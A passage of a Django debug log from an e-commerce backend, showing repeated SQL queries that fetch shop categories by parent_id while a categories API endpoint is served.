"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:50:02,000 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:50:02,004 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:50:02,014 utils 4252 140031503103744 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:50:02,022 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:50:02,025 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:50:02,028 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:50:02,032 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:50:02,035 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:50:02,040 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:50:02,043 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:50:02,046 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:50:02,049 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:50:02,052 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:50:02,057 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:50:02,060 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:50:02,064 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:50:02,068 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:50:02,071 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:50:02,074 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:50:02,080 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:50:02,083 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 06:50:02,087 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 06:50:02,090 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 06:50:02,093 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 06:50:02,099 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 06:50:02,103 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 06:50:02,107 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 06:50:02,111 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 06:50:02,115 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 06:50:02,122 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 06:50:02,126 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 06:50:02,129 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 06:50:02,133 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 06:50:02,137 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 06:50:02,141 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 06:50:02,146 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 06:50:02,150 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 06:50:02,154 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 06:50:02,159 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 06:50:02,163 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 06:50:02] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 06:50:04,885 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 06:50:04,897 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 06:50:04,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 06:50:04,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 06:50:04,913 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 06:50:04,917 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 06:50:04,922 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 06:50:04,926 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 06:50:04,931 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 06:50:04,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 06:50:04,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 06:50:04,946 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 06:50:04,950 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 06:50:04,954 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 06:50:04,960 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 06:50:04,964 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 06:50:04,968 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 06:50:04,972 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 06:50:04,976 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 06:50:04,982 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 06:50:04,986 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 06:50:04,990 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 06:50:04,994 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 06:50:04,998 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 06:50:05,003 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 06:50:05,010 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 06:50:05,014 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY 